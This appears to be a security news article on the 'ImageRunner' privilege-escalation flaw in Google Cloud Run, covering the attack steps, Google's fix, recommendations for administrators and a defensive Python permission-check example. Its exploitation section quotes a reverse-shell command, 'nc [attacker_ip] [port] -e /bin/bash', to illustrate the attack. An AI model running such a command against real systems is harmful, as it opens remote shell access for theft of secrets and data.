A significant security vulnerability has been disclosed in Google Cloud Platform (GCP) that could have allowed attackers to access private container images stored in Google Artifact Registry and Google Container Registry.
The vulnerability, dubbed "ImageRunner," has been fixed but highlights a concerning privilege escalation path that puts sensitive cloud resources at risk.
The ImageRunner Vulnerability >>>
Tenable Research reports that the vulnerability affects Google Cloud Run, a fully managed service for running containerized applications in a serverless environment.
At its core, the issue stems from how Cloud Run handles permissions during the container deployment process.
Identities with edit permissions on Cloud Run revisions (run.services.update and iam.serviceAccounts.actAs) could exploit this vulnerability to access private container images even without having the normally required registry permissions (Storage Object Viewer or Artifact Registry Reader).
When users deploy a Cloud Run service, a new "revision" is created, representing a specific version of the deployed service.
During this process, Cloud Run relies on a service agent to pull container images from registries. This service agent has elevated permissions to facilitate the deployment process.
Exploitation Method >>>
An attacker exploiting this vulnerability could:
1. Control an identity with run.services.update and iam.serviceAccounts.actAs permissions
2. Update a running Cloud Run service and edit a new revision
3. Specify any private container image within the same project
4. Inject malicious instructions as arguments or commands
For example, an attacker could specify a private "ncat" image and add the following command to establish a reverse shell: nc [attacker_ip] [port] -e /bin/bash.
Once executed, the attacker gains access to the container and can inspect its contents, extract secrets, or exfiltrate sensitive data.
The attack works because the Cloud Function's service agent (service-PROJECT_NUMBER@gcf-admin-robot.iam.gserviceaccount.com) has the necessary permissions to pull images, and this privilege is effectively "borrowed" by the attacker.
The ImageRunner vulnerability exemplifies what Tenable Research calls the "Jenga®" concept, where cloud services built on top of other services inherit their security risks. If one underlying service is compromised, the services built above it become vulnerable as well.
This vulnerability pattern has been observed across major cloud providers and introduces significant challenges for security teams trying to protect cloud infrastructures.
Google addressed the vulnerability by implementing a critical security control: the principal creating or updating a Cloud Run resource now needs explicit permission to access the container images being deployed.
Specifically, when using Artifact Registry, the principal must have the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container images.
The fix was fully rolled out to production on January 28, 2025, with advance notifications sent to affected Project, Folder, and Organization owners in November 2024.
Recommendations for Cloud Admins >>>
Organizations using the Google Cloud Platform should:
1. Ensure IAM permissions follow the principle of least privilege
2. Verify that all Cloud Run deployments are performed by identities that hold the appropriate registry permissions
3. Monitor for suspicious Cloud Run revision updates
4. Consider implementing additional security controls for container deployments
This vulnerability reminds us that cloud security requires vigilance against complex privilege escalation paths that might not be immediately obvious in modern multi-service architectures.
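The post-fix rule described above (the deploying principal must itself be able to read the image) and the recommendation to monitor revision updates, as an added Python example that is not Google's or Tenable's code: it evaluates constructed IAM bindings against the image an update references and flags revision updates that swap the image or change its command/args. The binding layout, principals, project and repository names are assumptions.

```python
"""Added example: model the post-fix Cloud Run deploy check and flag risky revision updates.
All data below is constructed for illustration; it is not real audit-log or IAM output."""
import re
from dataclasses import dataclass, field

# Roles that grant read access to container images (Artifact Registry Reader from the
# article; roles/storage.objectViewer is the Storage Object Viewer role used by GCR).
REGISTRY_READ_ROLES = {"roles/artifactregistry.reader", "roles/storage.objectViewer"}

# Artifact Registry image reference: <region>-docker.pkg.dev/<project>/<repository>/<image>
AR_IMAGE = re.compile(r"^(?P<host>[a-z0-9-]+-docker\.pkg\.dev)/(?P<project>[^/]+)/(?P<repo>[^/]+)/")

@dataclass
class Revision:
    """Minimal view of a Cloud Run revision: the container image plus its entrypoint overrides."""
    image: str
    command: list = field(default_factory=list)
    args: list = field(default_factory=list)

def image_scope(image):
    """Return the (project, repository) an Artifact Registry image lives in, or None."""
    m = AR_IMAGE.match(image)
    return (m["project"], m["repo"]) if m else None

def can_deploy(principal, bindings, image):
    """Post-fix rule: the principal updating the service must hold a registry read role on
    the image's project or repository. bindings: {principal: {scope: {roles}}}, where scope
    is a project id or "project/repository" (constructed layout, an assumption)."""
    scope = image_scope(image)
    if scope is None:          # unknown registry host: fail closed
        return False
    project, repo = scope
    roles = bindings.get(principal, {})
    granted = roles.get(project, set()) | roles.get(f"{project}/{repo}", set())
    return bool(granted & REGISTRY_READ_ROLES)

def risky_update(old, new):
    """Detection heuristic for the pattern in the article: a revision update that changes the
    image and/or injects a new command or argument list. Returns the reasons found."""
    reasons = []
    if old.image != new.image:
        reasons.append("image changed")
    if new.command != old.command or new.args != old.args:
        reasons.append("command/args changed")
    return reasons

# Constructed sample bindings: the developer can edit the service but cannot read images;
# the CI identity holds Artifact Registry Reader on one repository only.
BINDINGS = {
    "dev@example.com": {"proj-a": {"roles/run.developer"}},
    "ci@example.com": {"proj-a/app-images": {"roles/artifactregistry.reader"}},
}
```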